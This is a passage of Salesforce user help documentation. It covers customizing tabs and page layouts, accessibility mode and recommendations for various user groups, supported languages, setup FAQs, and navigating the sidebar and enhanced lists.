1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Change My Display, and click Customize My Tabs.
• If you clicked My Settings, select Display & Layout > Customize My Tabs.

3. If you have access to multiple apps, select the app whose tabs you want to customize from the Custom Apps drop-down
list.
By default, you’ll see the tabs for the selected custom app that are set for your profile.

Note:  The first tab that displays when you select an app may change if your administrator changes the app’s
default landing tab.

4. If desired, add each tab you want to display and change the display order of the tabs you’ve selected.
5. Click Save.

See Also:
Customizing Your Pages

Customizing Your Pages
Specify the related lists that appear in detail pages.

Available in: All editions except Database.com
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1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. Do one of the following:

• If you clicked Setup, from the left pane, select My Personal Information > Change My Display. Select an object from
the drop-down list, and click Customize My Pages.

• If you clicked My Settings, from the left pane, select Display & Layout > Customize My Pages. Select an object from
the drop-down list, and click Customize Page.

For your Home tab, select the dashboard snapshot to display on the Home tab. The link to customize your Home tab is
available only if your administrator has customized your home page layout to include a dashboard.

For all other tabs, specify which related lists display on your detail pages.

• To add or remove related lists, select a related list and click the Add or Remove arrow.

Note:  This setting may change if your administrator changes the page layout for a particular tab.

• To change the order of the related lists, select a related list title in the Selected List box, and click the Up or Down
arrow.

3. Click Save.

See Also:
Customizing Your Tabs

Adding Tabs for Frequently Used Items
The Salesforce user interface is composed of tabs, which serve as starting points for viewing, adding, and editing information
for an object. Different apps can have different sets of tabs. Add tabs for items you use frequently in any app.

Available in: All editions except Database.com

1. Click the Plus icon ( ) that appears to the right of your current tabs.
The All Tabs page appears. By default, it shows all the tabs you have available to view or add.

2. If you want to see a list of just the tabs for a specific app, select that app from the View drop-down.
3. Click Customize My Tabs.
4. In the Custom App dropdown, select the app where you want the tab to appear.

For example, if you want the Ideas tab to appear in your Marketing app, select Marketing and the Ideas tab will appear
in that app only.

5. Use the Add and Remove arrows to move tabs from the Available Tabs list to the Selected Tabs list. Use the Up and
Down arrows to change the order of the tabs.

6. Click Save.
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7. If you added a tab to an app you’re not actively using, open that app to see your new tab.

See Also:
Viewing Available Salesforce Tabs

Viewing Available Salesforce Tabs
Available in: All Editions except for Database.com

To view all the tabs available to you in Salesforce, click the plus icon (+) next to the main tabs.

Using this page, you can:

• Click any of the tab names to quickly jump to that tab.

• If you have multiple apps, use the View drop-down list to see each app’s logo and included tabs.

• Click Customize My Tabs to change how tabs display on your screen.

See Also:
Adding Tabs for Frequently Used Items

ACCESSIBILITY

Accessibility Overview
Available in: All Editions except Database.com

Salesforce.com is committed to providing high quality, on-demand enterprise applications that are accessible to all individuals,
regardless of their abilities. To help meet this goal, Salesforce.com seeks to meet the requirements of the following accessibility
standard and guideline: Section 508 and Web Content Accessibility Guidelines (WCAG) 2.0 Level A.

Salesforce on-demand applications incorporate a number of accessibility features that ensure all users have access and can use
the applications. Many of the features are provided in Accessibility Mode, which can be enabled on an individual user basis.
Accessibility Mode can provide a better user experience for users interacting by keyboard only or a screen reader. For more
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information, see Accessibility Recommendations for Specific User Groups on page 34 and Enabling Accessibility Mode on
page 32.

Accessibility Testing at Salesforce

Salesforce uses Internet Explorer® 8 for general accessibility testing and in conjunction with JAWS 11 for screen reader testing.
This means that Internet Explorer 8 and JAWS 11 are supported and recommended for use with the Salesforce on-demand
applications for access to the accessibility enhancements. You might find that other browsers and screen readers also work
well.

Salesforce and Accessibility

Salesforce supports the needs of users with different requirements. To achieve this, Salesforce provides two modes: Standard
Mode and Accessibility Mode. For some user groups, Standard Mode works perfectly well. Other user groups may find that
Accessibility Mode better suits their needs, particularly if they primarily use the keyboard to interact with Salesforce. See
Accessibility Recommendations for Specific User Groups on page 34 for information about the mode that works best for you.

The following features or functionality in Salesforce may impact accessibility:

• Plug-ins, such as Flash Player and Adobe Reader, are required to access some content.
• JavaScript support must be available and turned on.
• After a specified period of inactivity, a session timeout popup window automatically displays, prompting you to log out or

continue working. The time interval for this popup window is configurable by your administrator, or your administrator
can disable the session timeout popup altogether. Contact your Salesforce administrator for information about your
organization's settings. Your browser must allow pop-ups in Salesforce; otherwise you don't receive a warning about the
upcoming timeout.

• On edit pages, the keyboard focus defaults to the first editable field on the page. When creating or editing a task or event,
the keyboard focus defaults to the Subject field, regardless of its location on the page.

• Buttons, links, and fields that aren't currently active are labeled with a “disabled” attribute. For example, when using a
wizard with multiple steps, some buttons may be disabled until you select a specific option.

• Dashboards contain charts and graphs that are visual in nature. To access the report data used to generate the chart or
graph, simply select the dashboard component.

Note:  The underlying report may contain additional data than what is represented in the dashboard component.
In addition, the underlying report may contain some data that you don't have access to view due to sharing settings.

• If the improved setup user interface is not enabled for your organization, most of the Personal Setup section of Setup is
accessible. The exceptions are Chatter settings and creating HTML email templates. When creating email templates, we
recommend you choose text email templates.

If the improved setup user interface is enabled for your organization, personal settings pages under the My Settings menu
are not evaluated for 508 compliance.

• Third-party content may not be accessible, such as rich text editor and spell-checker.
• Pilot and Beta features may not be accessible.
• Accessibility features haven’t been incorporated into Chatter or the Service Cloud console.

Keyboard Shortcuts

In addition to the standard keyboard shortcuts available with your Web browser, Salesforce supports the following keyboard
shortcuts:

• Press ALT plus any number between 0 and 9 to highlight an item in the Recent Items list in the sidebar. For example,
press ALT+1 to highlight the first item in the list, ALT+2 to highlight the second item, and so on. Note that pressing
ALT+0 highlights the tenth item in the list.
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Note:  If you're using Mozilla Firefox, press SHIFT+ALT plus a number to automatically display the item you
highlighted. If you're using Mozilla Firefox on a Mac, press CTRL plus a number. If you're using Internet Explorer,
press ALT plus a number and then press Enter to display the highlighted item.

• If your organization has enabled the collapsible sidebar, press ALT+s to open or close the sidebar. Opening the sidebar
using ALT+s automatically places your cursor in the Search box.

• In the enhanced page layout editor, you can use the following keyboard shortcuts:

◊ Undo = CTRL+Z
◊ Redo = CTRL+Y
◊ Quick Save = CTRL+S

Required Plug-ins

The following Web plug-ins are required for viewing some content in Salesforce:

• Adobe Reader—For viewing various documentation PDF files. Go to the Adobe Reader download page to download a
free copy.

• Macromedia Flash Player—For taking online training courses. Go to the Adobe Flash Player download page to download
a free copy.

Areas Not Evaluated for 508 Compliance

The following areas of Salesforce have not been evaluated for compliance with Section 508:

• Setup pages to customize and administer a Salesforce organization
• Pages under the My Settings menu, if the improved setup user interface is enabled for your organization
• Connect for CTI
• Content Deliveries
• Salesforce CRM Content
• Connect for Lotus Notes
• Salesforce for Outlook
• Connect for Outlook
• Connect Offline
• Connect for Office
• Forecasts
• Salesforce Classic

Contacting Salesforce.com with 508 Accessibility Issues

Salesforce.com is committed to providing accessible documentation and support for all users. Documentation, customer
support, and knowledge base access are available by selecting the Help & Training link at the top of any page.

To report any 508 accessibility issues or to request an alternate format of any document free of charge, contact
accessibility@salesforce.com.

Note:  Customer support is not available for Personal and Developer Edition users. In addition, knowledge base
access is not available for Developer Edition users. All users are welcome to contact accessibility@salesforce.com in
English with any accessibility-related queries.
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Enabling Accessibility Mode
Available in: All Editions except Database.com

Salesforce provides an alternate user interface mode that enables users with screen readers (such as JAWS or Window-Eyes)
to use the application more effectively. The “accessibility mode” includes the full functionality of Salesforce with slight
modifications to create a better user experience for users with some disabilities or impairments, particularly those who are
blind.

To enable accessibility mode:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information, then click Edit.
• If you clicked My Settings, select Display & Layout > Accessibility.

3. Select the Accessibility Mode checkbox.
4. Click Save.

Areas Affected by Accessibility Mode

Some areas of Salesforce behave differently for users who have accessibility mode enabled.

• The following drop-down lists include a Go button that you must select to navigate to the option chosen in the drop-down
list. With accessibility mode disabled, these drop-down lists automatically navigate to the chosen option when you select
it.

◊ Force.com app menu at the top of every page
◊ Create New drop-down list in the sidebar of every page
◊ Divisions drop-down list in the sidebar of every page (Available only if your organization uses divisions to segment

data)
◊ Drop-down list to change your My Tasks view on the Home tab
◊ List view selector on every tab, including the activity list views available from the Home tab
◊ Drop-down list to change your view of recent records on the home page of every tab
◊ View drop-down list to show available tabs on the All Tabs page
◊ Custom App drop-down list to view and customize the tabs in your apps (available via the Customize My Tabs page)
◊ Folder selector for documents, dashboards, reports, and email templates
◊ Drop-down list to change your view in the Recycle Bin
◊ Forecast Summary drop-down list on the Forecast tab
◊ Drop-down list to change your display of roles (available from Setup via Manage Users > Roles)
◊ Drop-down list to change your display of territories (available from Setup via Manage Territories > Hierarchy)
◊ Custom report wizard drop-down list to select the type of data for the report
◊ Custom report wizard navigation drop-down list to move between steps of the wizard
◊ Use Existing View drop-down list on the Add Members subtab of the Manage Members page, accessible via the

Manage Members drop-down button on a campaign detail page
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• When accessibility mode is enabled, click Setup to access the setup pages. When accessibility mode is disabled, depending
on your user interface settings, click Your Name > Setup, or just click Setup.

• Inline Editing is disabled.
• Drag-and-drop editing on calendar views is disabled.
• Click-and-create events is disabled
• Drag-and-drop scheduling is disabled.
• Dashboard builder, the drag-and-drop editing interface for dashboards, is disabled.
• Report builder, the interactive interface for creating and editing reports, is disabled. Report builder is required to create or

edit joined reports and reports containing cross filters or buckets. Users with accessibility mode enabled can run those
reports, but can’t create or edit them.

• Related list hover links are disabled.
• When viewing the calendar, the event detail overlays are disabled. With accessibility mode disabled, users can hover the

mouse over an event in the calendar to view the event details in an overlay.
• Enhanced lists are disabled.
• Menu buttons are rendered as a drop-down list with a Go button.
• The HTML editor is disabled and replaced with a text box. This text box only accepts HTML and does not recognize

plain text entries like carriage returns. To separate content, you must use paragraph or line break HTML tags.

When accessibility mode is disabled, the HTML editor is available when posting an idea description or comment, asking
a question or replying to a question, and using a rich text area (RTA) field.

• The HTML editor for HTML solutions is disabled.
• The Check Spelling button for solutions is disabled.
• Overlay pages are rendered in a different format, such as separate pop-up windows or as standard JavaScript dialogs. Overlay

pages open on top of Salesforce pages and make Salesforce inactive until the overlay page is closed.
• When viewing a dashboard, the View Dashboard auto-complete filter is disabled and replaced by a standard drop-down

list.
• Drag-and-drop to move reports and dashboards between folders is not available.
• In accessibility mode, you must use the report wizard to create reports. The report builder is not available.
• When finding similar opportunities, the Match Criteria sidebar on the search results page is disabled. The Relevancy

column indicates how many fields the opportunity shares with your opportunity, followed by a list of the matching fields.
• The latest Manage Members page is disabled.
• The Edit Columns link on the Manage Members page, accessible via the Manage Members drop-down button on a

campaign detail page, becomes a drop-down button. The Edit Columns overlay is replaced by a standard setup page.
• The Recent Tags drop-down list doesn't display when you add the tag component to the sidebar.
• When you ask a question in an answers community, a list of similar questions doesn't appear before you post the question.

Users with accessibility mode enabled should use the search box on the Answers tab to see if their question has already
been asked before they post their question.

• The New Meeting Request button on the Open Activities related list is hidden. As a result, you can't request a meeting
in accessibility mode, and the Requested Meetings subtab in the Calendar section of the Home tab doesn't display any
meetings

• Clicking a requested meeting in the Open Activities related list and in some list views doesn't open the meeting detail
page. Instead, a dialog opens that instructs you to contact the meeting organizer for details about the requested meeting.

• The sidebar search doesn't display a list of your recent items when the sidebar search auto-complete feature is enabled.
• The Turn My Email On drop-down list on a Chatter group displays as a Chatter Email Settings link that opens your

settings for receiving Chatter email.

See Also:
Accessibility Recommendations for Specific User Groups
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Accessibility Recommendations for Specific User Groups
Available in: All Editions except Database.com

The accessibility recommendations provided in the following sections are based on the Enterprise Edition of Salesforce.com,
but many of these recommendations apply to all other editions. The following information is designed to assist individuals
with differing abilities to access the Salesforce.com.

We're constantly working on improving the accessibility of Salesforce.com. However, there may be areas of Salesforce.com
that aren't currently accessible for a variety of reasons. These areas are identified for each user group and are expected to be
corrected in future releases.

Specific accessibility issues are identified in our Voluntary Product Accessibility Template (a tool used to document a product's
conformance with the accessibility standards under Section 508 of the Rehabilitation Act). Please contact your Salesforce.com
customer support representative for a copy of this document.

Refer to the following sections for your user group:

• Sighted Keyboard Users on page 34

• Screen Reader Users (JAWS 11) on page 35

• Deaf or Hearing Impaired Users on page 37

• Specific Color Users on page 37

• Low Vision Users Who Need Magnification on page 38

See Also:
Enabling Accessibility Mode

Sighted Keyboard Users

Recommended Mode

Accessibility Mode enabled.

Features that rely on using the mouse in Standard Mode can be controlled by a keyboard in Accessibility Mode. In cases where
parallel functionality isn't available in Accessibility Mode, a keyboard user is generally able to perform the same outcome using
an alternate keyboard-accessible method.

Required Settings

Generally, Windows users don't need to turn on any settings to interact with Salesforce.com using a keyboard. Mac OS X
users need to turn on full keyboard access under System Preferences > Keyboard and Mouse > Keyboard Shortcuts.

Salesforce.com Features That Enhance Accessibility

The following features are available in Salesforce.com. However, you may find certain areas of the user interface where these
features are lacking. For example, some form controls are not in the correct place in a page’s tab order. These areas are expected
to be corrected in future releases.
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• In Standard Mode, information is displayed when you hover your mouse over specific parts of the user interface (like
information icons). In Accessibility Mode, this information can be displayed by selecting the corresponding part of the
user interface.

• A skip link is provided (first keyboard-focusable link on each page) to allow shifting of the focus to the start of the main
content area. This generally bypasses the navigational menus before the main content area, greatly reducing the number
of tab presses that would otherwise be required to reach the main content area of the page.

• Tab order is controlled with tabindex where the default order isn't logical.

Salesforce.com Features Not Optimized for Sighted Keyboard Users

The following functionality and features aren't fully accessible for sighted keyboard users, either due to their third-party
ownership, lack of adequate current support for accessibility solutions, or limitations imposed by our development environments:

• A visual focus indicator hasn't been implemented.
• Some content is displayed in overlay boxes without implementing corresponding keyboard focus and order control. These

are found in Chatter and training videos.
• Some of the rich interactive interfaces, such as drag-and-drop interfaces, aren't keyboard-accessible. These may have an

alternative provided or may not be available in Accessibility Mode.

Helpful Resources and Tips

Keyboard shortcut resources:

• Windows XP (http://support.microsoft.com/kb/301583)
• Windows Vista (http://windows.microsoft.com/en-us/windows-vista/Keyboard-shortcuts)
• Windows 7 (http://windows.microsoft.com/en-US/Windows7/Keyboard-shortcuts)
• Adobe Reader 8

(http://help.adobe.com/en_US/Reader/8.0/help.html?content=WS58a04a822e3e50102bd615109794195ff-7aee.html)
• Adobe Reader 9

(http://help.adobe.com/en_US/Acrobat/9.0/Standard/WS58a04a822e3e50102bd615109794195ff-7aed.w.html)

Visual focus indicator tools:

• Firefox browser with Mozilla's Accessibar (http://accessibar.mozdev.org/)
• Ai Squared's ZoomText (http://www.aisquared.com/zoomtext)
• Opera browser (http://www.opera.com/)
• Create your own style sheet for use in Internet Explorer

Screen Reader Users (JAWS 11)
The currently supported screen reader is JAWS 11 in conjunction with Internet Explorer 8.

Recommended Mode

Accessibility Mode enabled.

Features that rely on using the mouse in Standard Mode can be controlled by a keyboard in Accessibility Mode. In cases where
parallel functionality isn't available in Accessibility Mode, a keyboard user is generally able to perform the same outcome using
an alternate keyboard-accessible method.
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Required Settings

Salesforce.com recommends certain Personalized Web Settings for JAWS 11 screen readers. Personalized Web Settings apply
to the domain or sub-domain of the site from where you make the changes, such as www.salesforce.com. JAWS saves these
changes permanently and loads them each time you visit the specific site.

To modify the Personalized Web Settings in JAWS 11:

1. Open the JAWS Personalized Settings dialog (press SHIFT+INSERT+V) from the site you want to configure.
2. In the General Options section, configure the following settings:

a. Attributes Indicate to Off. This setting ensures JAWS doesn't announce onclick and onmouseover attributes.
These are used extensively in the default mode and are present but mostly inactive in Accessibility Mode.

b. Flash Movies Recognize to On. Flash movies are used for some training videos.
c. Page Refresh to Automatically.
d. Announce Live Region Updates to On

3. In the Links Options section, set Text Links Show Using to Title. This setting ensures JAWS announces information
provided through a link's title attribute, such as a warning that a new window will open.

4. In the Heading and Frame Options section, set Headings Announce to Heading and Level. Heading markup is used
to provide context as well as navigation.

5. Select Close.

JAWS' default announcement of certain signs may be confusing in some contexts. Chatter uses the # (hash) sign for adding
topics to posts and comments; and the @ (at) sign for mentioning people in posts and comments. By default JAWS announces
these signs as "number" and "at" respectively. You may prefer to be have these announced in a different way by JAWS. This
can be achieved by adding the sign and how JAWS should announce it to JAWS' dictionary. For example, you may add the
"@" sign and specify the announcement as "at symbol" or you may specify that JAWS plays a particular sound when it encounters
the @ sign. This would aid distinguishing between the @ sign and the word "at".

Salesforce.com Features That Enhance Accessibility

The following features are available in Salesforce.com. However, you may find certain areas of the user interface where these
features are lacking.These areas are expected to be corrected in future releases.

• Content provided in overlays in Standard Mode is presented in new windows in Accessibility Mode. This ensures that
keyboard interactivity doesn't stray outside of the content requiring the user's focus.

• Images are kept to a minimum.
• Important images have text alternatives equivalent to the purpose of the image; non-important images have empty text

equivalents or are implemented via the CSS. Images conveying detailed information, such as graphs provided in the
Dashboard, are also links to source data.

• Headings are marked up as headings. Headings help group content and are used instead of fieldset and legend elements
for grouping form controls.

• The main heading for the page (typically at the start of the main content area) is a level 1 heading (and is usually the only
level 1 heading in the page). This allows JAWS users to shift to this heading with the JAWS shortcut key.

• A skip link is provided (first keyboard-focusable link on each page) to allow shifting of the focus to the start of the main
content area. This generally bypasses the navigational menus before the main content area, greatly reducing the number
of tab presses that would otherwise be required to reach the main content area of the page.

• Data tables have data table markup to aid identification of headers for each cell.
• Lists provided in the main content area are marked up as lists.
• An asterisk (*) identifies required fields (announced as "star" by default in JAWS).
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Salesforce.com Features Not Optimized for Screen Reader Users

The following functionality and features aren't fully accessible for screen reader users, either due to their third party ownership,
lack of adequate current support for accessibility solutions, or limitations imposed by our development environments:

• Some of the rich interactive interfaces, such as drag and drop interfaces, are not accessible. These may have an alternative
provided or may not be available in Accessibility Mode.

• PDF files have not been marked up for accessibility and do not have an alternative provided.
• Training videos don't provide audio description (including extended audio description).
• Some content is displayed in overlay boxes that aren't recognized as modal by screen readers, allowing the user to interact

with other content without dismissing the overlay. These are found in Chatter and training videos.
• The session timeout warning may not provide sufficient time for a user response if a slow reading rate is used.

Accessibility features haven’t been incorporated into Chatter or the Service Cloud console.

Deaf or Hearing Impaired Users

Recommended Mode

Standard Mode

Required Settings

When viewing videos, you need to turn on captions by selecting the appropriate button.

Salesforce.com Features That Enhance Accessibility

The following features are available in Salesforce.com. However, you may find certain areas of the user interface where these
features are lacking.These areas are expected to be corrected in future releases.

• Sounds alone are not used.
• Captions and/or text transcript are provided for videos.

Salesforce.com Features Not Optimized for Deaf or Hearing Impaired Users

Synchronized captions aren't provided for most training videos.

Specific Color Users
The currently supported browser is Internet Explorer 8 (compatibility mode turned off) in Windows.

Recommended Mode

The mode that is best for you likely depends on your ability to distinguish overlays from background content. We encourage
you to try both Standard Mode and Accessibility Mode and then decide which mode works best for you.

Required Settings

Users who rely on settings within their browser and operating system to change the display to a particular color combination
may need to display image text alternatives to access information provided by important images. This is because the browser
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and operating system settings don't change the colors displayed within images, and Salesforce.com implements many images
as background images (which aren't displayed when browser and operating system settings for color display are in effect). In
some cases, Salesforce.com displays overlapping text when image text alternatives are displayed.

To display image text alternatives in Internet Explorer 8:

1. Select Tools > Internet Options .
2. Select the Advanced tab.
3. Select “Always expand ALT text for images” (located under the Accessibility grouping).
4. Deselect “Show pictures” (located under the Multimedia grouping).
5. Select OK and refresh page.

Salesforce.com Features That Enhance Accessibility

The following features are available in Salesforce.com. However, you may find certain areas of the user interface where these
features are lacking.These areas are expected to be corrected in future releases.

• Minimal use of images.
• Borders around most sections of content.
• An asterisk (*) identifies required fields.

Salesforce.com Features Not Optimized for Specifc Color Users

The following functionality and features are not fully accessible for specific color users, either due to their third party ownership,
lack of adequate current support for accessibility solutions, or limitations imposed by our development environments:

• Important images may not be shown with alternate color schemes enabled through your browser and/or operating system
settings. Refer to the previous instructions in this section on displaying image text alternatives.

• Video player controls don't display in alternate colors set through your browser and/or operating system settings.
• Some charts (for example, in reports and dashboards) rely on color to display information. If you have trouble interpreting

the information in charts, navigate to your personal settings, edit your personal information, and select Color-Blind
Palette on Charts. This option sets an alternate color palette for charts that has been optimized for use by color-blind
users. For dashboard emails, the alternate palette is not used. You can also click a chart to view its source report.

Helpful Resources and Tips

• Third-party products, such as ZoomText, have the ability to alter colors shown in images as well as text.
• Consider using a Macintosh computer for high contrast support.
• Enabling settings that display image text alternatives can be helpful. However, this may result in some overlapping of the

image text alternative and other text in the page.

Low Vision Users Who Need Magnification

Recommended Mode

The mode that is best for you likely depends on the degree of magnification that you require. We encourage you to try both
Standard Mode and Accessibility Mode and then decide which mode works best for you.
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Required Settings

Generally, screen magnifier users don't need specific settings in their browser or operating system. Browser-based users need
to adjust their browser’s zoom setting to suit their needs.

Salesforce.com Features That Enhance Accessibility

• Minimal use of images.
• Content and layout displays correctly up to at least 200%.

SETUP FAQS

View and Display FAQ
• What languages does Salesforce support?

• Why can't I see some buttons and links?

• Why can't I view Salesforce popup windows such as lookup dialogs and the Help & Training window?

• Why did my data disappear when I pressed the Backspace key while editing a record?

• Can I change or delete the drop-down list of entries that appears when I edit a text field?

What languages does Salesforce support?
Salesforce.com offers three levels of language support: fully supported languages, end user languages, and platform-only
languages. All languages are identified by a two-character language code (such as en) or a five-character locale code (such as
en_AU).

Note:  Setting a default locale is different from setting a default language.

Aside from the three levels of language support for Salesforce features, documentation, and application development tools,
there are two ways you can actually localize your organizations. First, the Translation Workbench: The Translation Workbench
lets you specify languages you want to translate, assign translators to languages, create translations for customizations you’ve
made to your Salesforce organization, and override labels and translations from managed packages. Everything from custom
picklist values to custom fields can be translated so your global users can use all of Salesforce in their language..

If your custom application uses a small number of Salesforce’s standard tabs and fields, you can translate them by renaming
tab and field labels.

Fully Supported Languages

You can change the language for all features, including Help, to one of the following fully supported languages from Setup
by clicking Company Profile > Company Information > Edit.

• Chinese (Simplified): zh_CN
• Chinese (Traditional): zh_TW
• Danish: da
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• Dutch: nl_NL
• English: en_US
• Finnish: fi
• French: fr
• German: de
• Italian: it
• Japanese: ja
• Korean: ko
• Portuguese (Brazil): pt_BR
• Russian: ru
• Spanish: es
• Swedish: sv
• Thai: th*

* Even though the Salesforce interface is fully translated to Thai, Help remains in English.

End User Languages

For end user languages, Salesforce provides translated labels for all standard objects and pages except Setup and Help. End
user languages are useful if you have a multilingual organization or partners who speak languages other than your company’s
default language.

When you specify an end user language, labels and Help that are not translated fall back to English except for Spanish (Mexico),
which falls back to Spanish.

• Arabic: ar
• Bulgarian: bg
• Czech: cs
• English (UK): en_GB
• Greek: el
• Spanish (Mexico): es_MX
• Hebrew: iw
• Hungarian: hu
• Indonesian: in
• Norwegian: no
• Polish: pl
• Romanian: ro
• Turkish: tr
• Ukrainian: uk
• Vietnamese: vi

Platform-Only Languages

Platform-only languages are used when you want to localize custom functionality (apps) that you’ve built on the Salesforce
platform. When you choose a platform-only language, Salesforce provides translations for all of the custom objects and field
labels in the chosen language.

Platform-only languages are available in all of the places you can select a language in the application, but selecting a platform-only
language will default all labels in the application to English. All customizations made to Salesforce can be translated into a
platform-only language, and renaming can be used to provide translations for standard field names on most objects. However,
informative text and non-field label text is not translatable.
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When you specify a platform-only language, labels for standard objects and fields fall back to English except: English (Australia),
English (India), English (Malaysia), and English (Philippines) fall back to English (UK); French (Canada) falls back to French;
Moldovan falls back to Romanian; and Portuguese (European) falls back to Portuguese (Brazil).

• Albanian: sq
• Armenian: hy
• Basque: eu
• Bosnian: bs
• Croatian: hr
• English (Australia): en_AU
• English (Canada): en_CA
• English (India): en_IN
• English (Malaysia): en_MY
• English (Philippines): en_PH
• Estonian: et
• French (Canada): fr_CA
• Georgian: ka
• Hindi: hi
• Icelandic: is
• Irish: ga
• Latvian: lv
• Lithuanian: lt
• Luxembourgish: lb
• Macedonian: mk
• Malay: ms
• Maltese: mt
• Moldovan: ro_MD
• Montenegrin: sh_ME
• Portuguese (European): pt_PT
• Romansh: rm
• Serbian (Cyrillic): sr
• Serbian (Latin): sh
• Slovak: sk
• Slovenian: sl
• Tagalog: tl
• Urdu: ur
• Welsh: cy

See Also:
Understanding Language, Locale, and Currency
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Why can't I see some buttons and links?
Buttons and links only display for users who have the appropriate permissions to use them. For example, users who do not
have the “Delete” permission on opportunities do not see the Delete button on an opportunity detail page nor do they see the
Del link on an opportunity related list.

Why can't I view Salesforce popup windows such as lookup
dialogs and the Help & Training window?

If your browser's popup blocker settings are configured for maximum security, you won’t be able to view any popup windows
within Salesforce—even those that provide necessary functionality such as the calendar popup for choosing a date on an activity,
lookup dialogs for selecting a record, the Help & Training window, and more.

To test your popup settings:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Reminders.
• If you clicked My Settings, select Calendars & Reminders > Reminders.

3. Click Preview Reminder Alert

To allow popup windows for Salesforce, add Salesforce as a trusted site within your browser's popup blocker settings. Consult
the online help for your browser for specific instructions.

Some browser add-ons, like the Google toolbar, also have popup blocking. Consult your software documentation on those
products for details on how to configure them to allow popup windows from Salesforce.

Why did my data disappear when I pressed the Backspace
key while editing a record?

Some versions of Internet Explorer use the Backspace key as a keyboard shortcut for the browser’s Back button. When you
press the Backspace key and your cursor is not within a text field, the browser goes back to the previous page, making it appear
that your data has been lost. To retrieve your data and return to the page you were working on, click your browser’s Forward
button.

Can I change or delete the drop-down list of entries that
appears when I edit a text field?

No. These auto-complete entries that appear when you are editing certain text fields are a feature of Internet Explorer. The
browser remembers text you have entered previously and provides a list of those entries for you to automatically complete the
field. If you would like to turn this feature off, click Tools on your browser’s menu bar, select Internet Options, click the
Content tab, and then choose the AutoComplete button to change your browser’s settings.
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NAVIGATE SALESFORCE

Opening a Different Salesforce App
Available in: All editions except Database.com

User Permissions Needed

Access to that app as specified in your user profile or
permission set.

To use an app:

If you need to use features available in a different Salesforce app than the one you have open, you need to open the other app.
You can have one app open at a time, and the app you have open will open the next time you log on to Salesforce.

To open an app: In the upper-right corner of any Salesforce page, select the app you want from drop-down app menu.

Understanding Salesforce Pages
Salesforce apps are made up of tabs and pages. Objects and other items typically have tabs, and from an object’s tab, you
navigate through pages to interact with the features you’re using. For example, if you want to create an account, you’ll click
the Accounts tab, and land on the Accounts Home page. Click New to open the Account Edit page where you’ll enter
information for the account. Click Save, and you’ll see the account’s Detail page. Return to the Accounts Home page and the
new account is listed.

Salesforce tabs can have multiple of types of pages, including home, edit, and detail pages, and you can create list views for a
lot of the objects you use. Chatter has one primary page type: a feed. And Data.com has a search interface. Dashboards and
reports have their own page styles, as well.

Your system administrator typically sets up page layouts for standard objects, and enables the navigation features your
organization can use, but interacting with Salesforce is easier if you understand the most common page elements for the most
frequently used objects. They include:

1. A tag bar, where you can view and add tags for a record.
2. feed, where you can add and view comments about a record.
3. A sidebar, where you can do things like search and quickly create new records.
4. Sections for the record, with key fields and links.
5. Related lists, which group and display links to other records linked to the one you’re viewing. You can change the order of

related lists on your page.
6. Various links that help you move around the page or go to different pages or external sites.

Let’s look at these elements on an account detail page.
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See Also:
Tags Overview
Understanding the Salesforce Sidebar

Understanding the Salesforce Sidebar
Available in: All Editions except Database.com

The sidebar column that appears on the left side of most Salesforce pages provides convenient access to the following links
and commands.
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• Search

Use the header search box, if you don't have sidebar search.

• The Tags link and Recent Tags drop-down list

• The Divisions drop-down list

• The Create New drop-down list

• A Calendar shortcut to your last used calendar view

• The Recent Items list

• Messages and Alerts

• Custom Links

• A shortcut to the Recycle Bin

The options in your sidebar vary depending on the features you have enabled and whether your administrator has customized
the page layout.

Showing and Hiding the Collapsible Sidebar
Available in: All editions except Database.com

If your administrator has enabled the Collapsible Sidebar, you can show or hide the sidebar as needed.

Note:  Call center users won't see incoming calls if they collapse the sidebar.

Click the edge of the sidebar to open or close the sidebar as needed.

Opening Items You’ve Recently Viewed
Available in: All Editions

In the Recent Items section of the Salesforce Salesforce sidebar, you’ll find a list of up to 10 items (records, documents, custom
objects, and the like) you’ve most recently added, edited, or viewed.

To open any item’s detail or edit page, just click its link.

Tip:  If your organization has enabled hover details, you can hover your mouse over any item in the Recent Items list
to view key information about the record before clicking into that record's detail or edit page.
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Note:  Your Recent Items may show fewer than 10 items if you have recently deleted any of your recently viewed
items. Likewise, the Recent lists on the tab home pages (for example, the Recent Leads list) may show fewer than
10 or 25 items if you have recently deleted items.

Working with Enhanced Lists
Available in: All Editions except Database.com

User Permissions Needed

“Mass Edit from Lists”To use inline editing in an enhanced list:

Enhanced lists give you the ability to quickly view, customize, and edit list data to speed up your daily productivity. They must
first be enabled by your administrator for you to take advantage of them.

Enhanced lists allow you to:

• Navigate through the list results by clicking the first page icon (<<), Previous, Next, or the last page icon (>>) at the bottom
of the list.

• Jump to a specific page of results by entering a number in the text box in the lower right corner, and then pressing ENTER.

• Create a new view by clicking Create New View. Edit, delete or refresh the current view by clicking Edit, Delete, or ,
respectively.

• Change the number of records displayed per page. Click  in the lower left corner of the list and select the desired setting.
You can view 10, 25, 50, 100, or 200 records at a time. When you change this setting, you return to the first page of list
results.

Changing your preference for the number of records displayed per page applies to all lists in all Salesforce apps, not just
the one currently displayed. In addition, if you change your preference to 200, a message warns you of possible performance
degradation.

• Change the width of a column by dragging the right side of the column heading with your mouse. Any changes you make
to column widths are specific to that list only, and are preserved when you next view the list.

If you add or remove columns from a list, any column width customizations for that list are discarded automatically.

• Change the order in which a column is displayed by dragging the entire column heading with your mouse to the desired
position. If you have permission to edit the list definition, your changes are automatically saved for all users who see the
list. If you do not have permission to edit the list definition, your changes are discarded when you navigate away from the
page.

• Change the number and order of columns displayed by clicking Edit next to the list drop-down in the upper left corner.

• If your administrator has enabled inline editing for your organization, edit single records directly from the list by
double-clicking on individual field values. If your administrator has granted you the “Mass Edit from Lists” permission,
you can also edit up to 200 records at a time.

• On account, contact, and lead list views, click the Open Calendar link at the bottom of the page to display a weekly
view of a calendar underneath the list. Then, you can drag a record from the list to a time slot on the calendar to quickly
create an event associated with the record. Note that your administrator controls the availability of the Drag-and-Drop
Scheduling feature.
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Navigating Long Lists
Available in: All Editions

Many list pages in Salesforce include the following tools for managing a large amount of data:

